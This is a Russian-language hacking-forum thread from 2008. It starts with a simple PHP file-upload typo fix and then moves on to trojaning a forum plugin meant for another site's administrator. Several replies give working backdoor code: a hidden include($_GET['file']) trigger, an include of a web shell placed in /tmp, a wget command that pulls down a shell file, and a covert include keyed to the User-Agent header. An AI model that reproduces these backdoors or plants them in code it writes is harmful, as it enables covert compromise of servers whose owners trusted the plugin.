HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.03.2008, 03:42
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 850
С нами: 9975266

Репутация: 1916


По умолчанию

чёт не втыкаю в чём проблема=//

PHP код:
<?php
echo '<form engtype="multipart/form-data" method="post" action="image.php">
<input type="file" name="image" /><br />
<input type="submit" name="submit" /></form> '
;

if(isset(
$_POST['submit']))
{
    if(!empty(
$_FILES['image']))
    {
       
#############
    
}
    else
    {
        echo 
'Пусто';
    }
}
выдаёт пусто....
я уже полчаса туплю не могу вьехать в чём проблема...почему файл в массив не помещается?
 
Ответить с цитированием

  #2  
Старый 30.03.2008, 04:38
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
echo '<form engtype="multipart/form-data" method="post" action="image.php">
у тебя engtype, а надо enctype
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 30.03.2008 в 04:44..
 
Ответить с цитированием

  #3  
Старый 30.03.2008, 11:12
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 850
С нами: 9975266

Репутация: 1916


По умолчанию

Цитата:
Сообщение от Scipio  
у тебя engtype, а надо enctype
аааа...блин...опечатался и сидел думал чё за хня.
Скип и Воланд спасибо
пойду убью себя ап стену =/
 
Ответить с цитированием

  #4  
Старый 30.03.2008, 09:27
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию

вставляешь в страницу вот это
if(@$_GET["hack"] == "yes") include($_GET['file']);

а вызываешь вот так

http://site.ru/index.php?hack=yes&file=http://site.ru/shell.txt
 
Ответить с цитированием

  #5  
Старый 30.03.2008, 09:43
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
С нами: 9599075

Репутация: 5
По умолчанию

Warning: include() [function.include]: URL file-access is disabled in the server configuration

Вот такую ошибку нельзя обойти или это только в конфигах меняется?
 
Ответить с цитированием

  #6  
Старый 30.03.2008, 10:06
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
С нами: 9599075

Репутация: 5
По умолчанию

Цитата:
Сообщение от [x26]VOLAND  
Вот теперь понятно. В настройках PHP отключена опция allow_url_include
Обойти её в большинстве случев нельзя, надо просить хостера включить (сам просил, всегда прокатывало).
это что при выключенном параметре, невозможен php-инклудинг?
З.Ы. я этот скрипт хочу не себе поставить, поэтому я должен быть готов на все случаи жизни=), шелл я подсунуть не могу уж слишком он громоздкий, спалят...

Последний раз редактировалось QZAR-X; 30.03.2008 в 10:10..
 
Ответить с цитированием

  #7  
Старый 30.03.2008, 10:11
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию

да невозможен и ничего ты несделаешь с удаленного сервера шел не приинклудишь а вот с того сервера котором ты находится должен смоч приинклудить попробуй с локального сервера шел приинклудить.
Попробуй залить в папку /tmp шел а потом вставь в скрипт что то типо этого
<?
include ("/tmp/shell.txt")
?>

Последний раз редактировалось heks; 30.03.2008 в 10:14..
 
Ответить с цитированием

  #8  
Старый 30.03.2008, 10:17
QZAR-X
Новичок
Регистрация: 14.02.2008
Сообщений: 13
С нами: 9599075

Репутация: 5
По умолчанию

я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?



А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php

Последний раз редактировалось QZAR-X; 30.03.2008 в 10:26..
 
Ответить с цитированием

  #9  
Старый 30.03.2008, 10:49
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами: 9849598

Репутация: 126
По умолчанию

Цитата:
Сообщение от QZAR-X  
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?



А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php

встрой туда что я тебе сказал и все будет возможно использовать можно будет какой либо качалкой залить с удаленного сайта шел примерно так сам точно незнаю скрипт в котором это было где то есть но я непомню где ;(
wget http://site.ru/shell.txt;mv shell.txt shell.php но дира должна быть доступна для записи
 
Ответить с цитированием

  #10  
Старый 30.03.2008, 11:53
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от QZAR-X  
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд.
Так тебе надо скрипт протроянить? вот:
Цитата:
$k=$_SERVER["USER_AGENT"];
это где нить незаметно так

if (strpos($k,"f35761"){ $path=explode(":",$k); include($path[1]);}

а уж юзер агент на такой: f35761:/path/to/shell.php
сменить каждый может, и шелл спрятать далеко на сервере или даже на удаленном сервере
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5421 21.04.2026 07:37
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.